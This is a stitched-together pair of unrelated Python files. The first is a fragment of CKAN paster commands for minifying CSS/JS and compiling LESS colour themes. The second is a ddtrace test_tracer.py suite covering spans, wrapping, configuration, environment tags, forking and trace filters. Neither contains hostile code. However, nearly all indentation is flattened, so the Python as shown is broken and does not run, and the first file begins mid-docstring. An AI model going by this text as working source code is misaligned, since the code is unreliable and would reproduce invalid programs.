paster minify ckan/public/base/css/red.css
    If the --clean option is provided, any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False, help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
                # Path is neither a file nor a directory; skip it.
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
        minified.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
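    # Each entry in custom_css above is written to custom.less in turn and
    # compiled into css/<color>.css by less() below.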
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import mock
import pytest
import six
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.tracer import _has_aws_lambda_agent_extension
from ddtrace.tracer import _in_aws_lambda
from tests.subprocesstest import run_in_subprocess
from tests.utils import TracerTestCase
from tests.utils import override_global_config
from ..utils import override_env
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
        # a weird case where manually calling finish with an unserializable
        # span was causing a loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.current_trace_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
ctx = self.tracer.context_provider.active()
assert ctx is None
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.pop_spans()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
        # When no service is provided, the global config default is used
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=None,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_dogstatsd_url_host_port(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
def test_configure_dogstatsd_url_socket(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.agent_url == "http://localhost:8126"
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer.agent_url == "http://foobar:12"
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer.agent_url == "unix:///foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer.agent_url == "http://localhost"
t = ddtrace.Tracer(url="https://localhost")
assert t.writer.agent_url == "https://localhost"
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert (
str(e.value) == "Unsupported protocol 'foo' in Agent URL 'foo://foobar:12'. Must be one of: http, https, unix"
)
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_has_calls(
[
mock.call(timeout=None),
mock.call(timeout=None),
]
)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Stop should be called when replacing the writer.
t.configure(hostname="localhost", port=8126)
assert orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t.writer.dogstatsd.host == "localhost"
assert t.writer.dogstatsd.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer is not original_writer
assert t.writer._buffer is not original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env_with_lambda(self):
assert _in_aws_lambda()
assert not _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, LogWriter)
tracer.configure(enabled=True)
assert isinstance(tracer.writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agent_config_with_lambda_extension(self):
def mock_os_path_exists(path):
return path == "/opt/extensions/datadog-agent"
assert _in_aws_lambda()
with mock.patch("os.path.exists", side_effect=mock_os_path_exists):
assert _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
tracer.configure(enabled=False)
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
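    # Both tracers run in the same process, so they share one runtime-id tag.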
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters(tracer, test_spans):
class FilterAll(object):
def process_trace(self, trace):
return None
tracer.configure(
settings={
"FILTERS": [FilterAll()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
tracer.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit(tracer, test_spans):
s1 = tracer.trace("1")
s2 = tracer.trace("2")
s1.finish()
tracer.log = mock.MagicMock(wraps=tracer.log)
s2.finish()
calls = [
mock.call("span %r closing after its parent %r, this is an error when not using async", s2, s1),
]
tracer.log.debug.assert_has_calls(calls)
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = tracer.trace("1-1")
s1.finish()
assert s1.parent_id is None
